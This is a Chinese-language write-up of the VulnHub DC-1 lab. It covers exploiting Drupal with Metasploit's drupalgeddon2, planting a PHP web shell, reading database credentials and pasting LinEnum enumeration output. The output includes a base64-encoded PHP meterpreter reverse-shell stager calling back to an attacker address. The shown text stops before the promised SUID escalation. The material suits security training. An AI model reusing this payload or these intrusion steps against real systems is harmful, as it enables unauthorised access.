vunlhub-DC-1-LinuxSuid提权

 

 

 

 

将靶场搭建起来 桥接看不到IP 于是用masscan 进行C段扫描 试试80 8080 

 

访问之后发现是个drupal

 掏出msf搜索一波

使用最近年限的exp尝试

 exploit/unix/webapp/drupal_drupalgeddon2

攻击成功 返回meterpreter的shell

 进行简单的信息收集

发现并不是root权限 ,想办法进行提权,首先执行常用的Linux提权检查工具

./Linux_Exploit_Suggester.pl

并没有返回可用的提权建议 于是用searchsploit 3.2.0尝试

表红框的exp.c编译并没有成功 提权失败

 上菜刀方便查看文件 shell.php

尝试去进行Linux -udf提权 

然后想的是用菜刀翻看连接数据库的账户看是否是高权限

/var/www/sites/default/settings.php

发现账号密码 但估计不是高权限

连接尝试

并不是root高权限

然后用Linux 提权检查工具LinEnum.sh 查看弱点

   1 #########################################################
   2 # Local Linux Enumeration & Privilege Escalation Script #
   3 #########################################################
   4 # www.rebootuser.com
   5 # version 0.95
   6 
   7 [-] Debug Info
   8 [+] Thorough tests = Disabled
   9 
  10 
  11 Scan started at:
  12 Tue May  7 01:08:48 AEST 2019
  13 
  14 
  15 ### SYSTEM ##############################################
  16 [-] Kernel information:
  17 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
  18 
  19 
  20 [-] Kernel information (continued):
  21 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
  22 
  23 
  24 [-] Specific release information:
  25 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
  26 NAME="Debian GNU/Linux"
  27 VERSION_ID="7"
  28 VERSION="7 (wheezy)"
  29 ID=debian
  30 ANSI_COLOR="1;31"
  31 HOME_URL="http://www.debian.org/"
  32 SUPPORT_URL="http://www.debian.org/support/"
  33 BUG_REPORT_URL="http://bugs.debian.org/"
  34 
  35 
  36 [-] Hostname:
  37 DC-1
  38 
  39 
  40 ### USER/GROUP ##########################################
  41 [-] Current user/group info:
  42 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  43 
  44 
  45 [-] Users that have previously logged onto the system:
  46 Username         Port     From             Latest
  47 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
  48 
  49 
  50 [-] Who else is logged on:
  51  01:08:48 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
  52 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  53 
  54 
  55 [-] Group memberships:
  56 uid=0(root) gid=0(root) groups=0(root)
  57 uid=1(daemon) gid=1(daemon) groups=1(daemon)
  58 uid=2(bin) gid=2(bin) groups=2(bin)
  59 uid=3(sys) gid=3(sys) groups=3(sys)
  60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  61 uid=5(games) gid=60(games) groups=60(games)
  62 uid=6(man) gid=12(man) groups=12(man)
  63 uid=7(lp) gid=7(lp) groups=7(lp)
  64 uid=8(mail) gid=8(mail) groups=8(mail)
  65 uid=9(news) gid=9(news) groups=9(news)
  66 uid=10(uucp) gid=10(uucp) groups=10(uucp)
  67 uid=13(proxy) gid=13(proxy) groups=13(proxy)
  68 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  69 uid=34(backup) gid=34(backup) groups=34(backup)
  70 uid=38(list) gid=38(list) groups=38(list)
  71 uid=39(irc) gid=39(irc) groups=39(irc)
  72 uid=41(gnats) gid=41(gnats) groups=41(gnats)
  73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
  75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
  76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
  77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
  78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
  79 uid=105(mysql) gid=109(mysql) groups=109(mysql)
  80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
  81 
  82 
  83 [-] Contents of /etc/passwd:
  84 root:x:0:0:root:/root:/bin/bash
  85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  86 bin:x:2:2:bin:/bin:/bin/sh
  87 sys:x:3:3:sys:/dev:/bin/sh
  88 sync:x:4:65534:sync:/bin:/bin/sync
  89 games:x:5:60:games:/usr/games:/bin/sh
  90 man:x:6:12:man:/var/cache/man:/bin/sh
  91 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  92 mail:x:8:8:mail:/var/mail:/bin/sh
  93 news:x:9:9:news:/var/spool/news:/bin/sh
  94 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  95 proxy:x:13:13:proxy:/bin:/bin/sh
  96 www-data:x:33:33:www-data:/var/www:/bin/sh
  97 backup:x:34:34:backup:/var/backups:/bin/sh
  98 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  99 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 100 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 101 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 102 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 103 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 104 statd:x:102:65534::/var/lib/nfs:/bin/false
 105 messagebus:x:103:107::/var/run/dbus:/bin/false
 106 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 107 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 108 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 109 
 110 
 111 [-] Super user account(s):
 112 root
 113 
 114 
 115 [-] Are permissions on /home directories lax:
 116 total 12K
 117 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 118 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 119 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 120 
 121 
 122 [-] Root is allowed to login via SSH:
 123 PermitRootLogin yes
 124 
 125 
 126 ### ENVIRONMENTAL #######################################
 127 [-] Environment information:
 128 APACHE_PID_FILE=/var/run/apache2.pid
 129 APACHE_RUN_USER=www-data
 130 APACHE_LOG_DIR=/var/log/apache2
 131 PATH=/usr/local/bin:/usr/bin:/bin
 132 PWD=/var/www
 133 APACHE_RUN_GROUP=www-data
 134 LANG=C
 135 SHLVL=1
 136 APACHE_LOCK_DIR=/var/lock/apache2
 137 APACHE_RUN_DIR=/var/run/apache2
 138 _=/usr/bin/env
 139 
 140 
 141 [-] Path information:
 142 /usr/local/bin:/usr/bin:/bin
 143 
 144 
 145 [-] Available shells:
 146 # /etc/shells: valid login shells
 147 /bin/sh
 148 /bin/dash
 149 /bin/bash
 150 /bin/rbash
 151 
 152 
 153 [-] Current umask value:
 154 0022
 155 u=rwx,g=rx,o=rx
 156 
 157 
 158 [-] umask value as specified in /etc/login.defs:
 159 UMASK        022
 160 
 161 
 162 [-] Password and storage information:
 163 PASS_MAX_DAYS    99999
 164 PASS_MIN_DAYS    0
 165 PASS_WARN_AGE    7
 166 ENCRYPT_METHOD SHA512
 167 
 168 
 169 ### JOBS/TASKS ##########################################
 170 [-] Cron jobs:
 171 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 172 
 173 /etc/cron.d:
 174 total 16
 175 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 176 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 177 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 178 -rw-r--r--  1 root root  510 May 10  2018 php5
 179 
 180 /etc/cron.daily:
 181 total 68
 182 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 183 drwxr-xr-x 85 root root  4096 May  7 00:08 ..
 184 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 185 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 186 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 187 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 188 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 189 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 190 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 191 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 192 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 193 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 194 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 195 
 196 /etc/cron.hourly:
 197 total 12
 198 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 199 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 200 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 201 
 202 /etc/cron.monthly:
 203 total 12
 204 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 205 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 206 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 207 
 208 /etc/cron.weekly:
 209 total 16
 210 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 211 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 212 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 213 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 214 
 215 
 216 [-] Crontab contents:
 217 # /etc/crontab: system-wide crontab
 218 # Unlike any other crontab you don't have to run the `crontab'
 219 # command to install the new version when you edit this file
 220 # and files in /etc/cron.d. These files also have username fields,
 221 # that none of the other crontabs do.
 222 
 223 SHELL=/bin/sh
 224 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 225 
 226 # m h dom mon dow user    command
 227 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 228 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 229 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 230 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 231 #
 232 
 233 
 234 ### NETWORKING  ##########################################
 235 [-] Network and IP info:
 236 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 237           inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
 238           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 239           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 240           RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
 241           TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
 242           collisions:0 txqueuelen:1000 
 243           RX bytes:1325354 (1.2 MiB)  TX bytes:1103771 (1.0 MiB)
 244 
 245 lo        Link encap:Local Loopback  
 246           inet addr:127.0.0.1  Mask:255.0.0.0
 247           inet6 addr: ::1/128 Scope:Host
 248           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 249           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 250           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 251           collisions:0 txqueuelen:0 
 252           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 253 
 254 
 255 [-] ARP history:
 256 192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
 257 192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE
 258 
 259 
 260 [-] Nameserver(s):
 261 nameserver 192.168.16.254
 262 nameserver 0.0.0.0
 263 
 264 
 265 [-] Default route:
 266 default via 192.168.16.254 dev eth0 
 267 
 268 
 269 [-] Listening TCP:
 270 Active Internet connections (servers and established)
 271 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 272 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
 273 tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
 274 tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -               
 275 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
 276 tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
 277 tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php        
 278 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 279 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 280 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 281 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 282 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 283 tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -               
 284 tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -               
 285 
 286 
 287 [-] Listening UDP:
 288 Active Internet connections (servers and established)
 289 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 290 udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -               
 291 udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
 292 udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
 293 udp        0      0 0.0.0.0:769             0.0.0.0:*                           -               
 294 udp        0      0 127.0.0.1:801           0.0.0.0:*                           -               
 295 udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -               
 296 udp6       0      0 :::52815                :::*                                -               
 297 udp6       0      0 :::28256                :::*                                -               
 298 udp6       0      0 :::111                  :::*                                -               
 299 udp6       0      0 :::769                  :::*                                -               
 300 
 301 
 302 ### SERVICES #############################################
 303 [-] Running processes:
 304 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 305 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 306 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 307 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 308 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 309 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 310 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 311 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 312 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 313 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 314 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 315 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 316 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 317 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 318 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 319 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 320 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 321 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 322 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
 323 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
 324 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
 325 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
 326 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
 327 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
 328 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
 329 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
 330 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
 331 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
 332 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
 333 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
 334 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
 335 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
 336 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
 337 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
 338 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
 339 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
 340 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
 341 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
 342 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
 343 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
 344 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
 345 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
 346 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
 347 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
 348 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
 349 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
 350 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
 351 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
 352 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
 353 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
 354 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
 355 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
 356 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
 357 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
 358 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
 359 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
 360 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
 361 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
 362 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
 363 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
 364 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
 365 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
 366 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
 367 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
 368 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
 369 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
 370 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
 371 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
 372 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
 373 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
 374 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
 375 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 376 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 377 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
 378 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 379 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
 380 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
 381 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
 382 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
 383 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
 384 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
 385 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
 386 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
 387 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
 388 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
 389 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
 390 root      3298  0.0  0.2   5196  2320 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
 391 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
 392 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
 393 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 394 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 395 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 396 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 397 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 398 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 399 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
 400 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
 401 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
 402 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
 403 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
 404 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
 405 www-data  4398  0.0  0.1   3500  1764 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
 406 www-data  4399  0.0  0.1   3552  1380 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
 407 www-data  4400  0.0  0.0   1876   452 ?        S    01:08   0:00 tee -a
 408 www-data  4570  0.0  0.1   3536  1092 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
 409 www-data  4571  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
 410 
 411 
 412 [-] Process binaries and associated permissions (from above list):
 413 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
 414 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
 415 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
 416 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
 417 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
 418 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
 419 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
